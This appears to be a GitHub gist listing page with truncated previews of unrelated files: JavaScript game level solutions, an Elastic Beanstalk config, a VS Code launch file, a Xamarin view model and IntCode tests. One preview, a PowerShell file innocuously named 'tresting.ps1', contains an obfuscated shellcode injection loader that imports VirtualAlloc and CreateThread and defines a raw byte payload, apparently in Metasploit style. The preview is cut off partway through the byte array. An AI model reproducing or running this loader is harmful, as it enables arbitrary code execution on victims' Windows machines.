View untrusted-lvl2-solution.js
/******************** | |
* theLongWayOut.js * | |
******************** | |
* | |
* Well, it looks like they're on to us. The path isn't as | |
* clear as I thought it'd be. But no matter - four clever | |
* characters should be enough to erase all their tricks. | |
*/ | |
function startLevel(map) { |
View 01_sidekiq_upstart.config
files: | |
"/opt/elasticbeanstalk/support/conf/sidekiq.conf": | |
mode: "000755" | |
content: | | |
description "Elastic Beanstalk Sidekiq Upstart Manager" | |
start on runlevel [2345] | |
stop on runlevel [06] | |
# explained above | |
respawn |
View untrusted-lvl1-solution.js
/***************** | |
* cellBlockA.js * | |
***************** | |
* | |
* Good morning, Dr. Eval. | |
* | |
* It wasn't easy, but I've managed to get your computer down | |
* to you. This system might be unfamiliar, but the underlying | |
* code is still JavaScript. Just like we predicted. | |
* |
View ML0101EN-Reg-Polynomial-Regression-Co2-py-v1.ipynb

Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View launch.json
{ | |
// Use IntelliSense to learn about possible attributes. | |
// Hover to view descriptions of existing attributes. | |
// For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387 | |
"version": "0.2.0", | |
"configurations": [ | |
{ | |
"type": "node", |
View tresting.ps1
$dZCfkXmhQxnQv = @" | |
[DllImport("kernel32.dll")] | |
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); | |
[DllImport("kernel32.dll")] | |
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); | |
"@ | |
$svtrnBvR = Add-Type -memberDefinition $dZCfkXmhQxnQv -Name "Win32" -namespace Win32Functions -passthru | |
[Byte[]] $EZVFkGTTRANHaHi = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58 |
View MainPageViewModel.cs
using Xamarin.Forms; | |
namespace WePayFormsSample.ViewModels | |
{ | |
public class MainPageViewModel: INotifyPropertyChanged | |
{ | |
IWePayApiManager WePayApiManager { get; set; } = new WePayApiManager(); | |
public WePayAccountResponse WePayAccount { get; set; } | |
public bool IsPaymentConnected { get { return WePayAccount != null; } } | |
public bool IsBusy { get; set; } |
View tmp
tmpstring |
View untrusted-lvl3-solution.js
/************************ | |
* validationEngaged.js * | |
************************ | |
* | |
* They're really on to us now! The validateLevel function | |
* has been activated to enforce constraints on what you can | |
* do. In this case, you're not allowed to remove any blocks. | |
* | |
* They're doing all they can to keep you here. But you | |
* can still outsmart them. |
View index.test.ts
import { IntCodeState, fromProgramString, compute, IntCodeTape, pushInput, popOutput, computeTillStop, computeTillOutput } from "./index"; | |
const largeExample:string = '3,21,1008,21,8,20,1005,20,22,107,8,21,20,1006,20,31,1106,0,36,98,0,0,1002,21,125,20,4,20,1105,1,46,104,999,1105,1,46,1101,1000,1,20,4,20,1105,1,46,98,99' | |
const quine:string = '109,1,204,-1,1001,100,1,100,1008,100,16,101,1006,101,0,99'; | |
const bigOutput:string = '104,1125899906842624,99'; | |
const bigMult:string = '1102,34915192,34915192,7,4,7,99,0'; | |
const ioHalt:string = '3,0,4,0,99' | |
describe('IntCode', ():void => { | |
describe('fromInputString(input)', ():void => { |
NewerOlder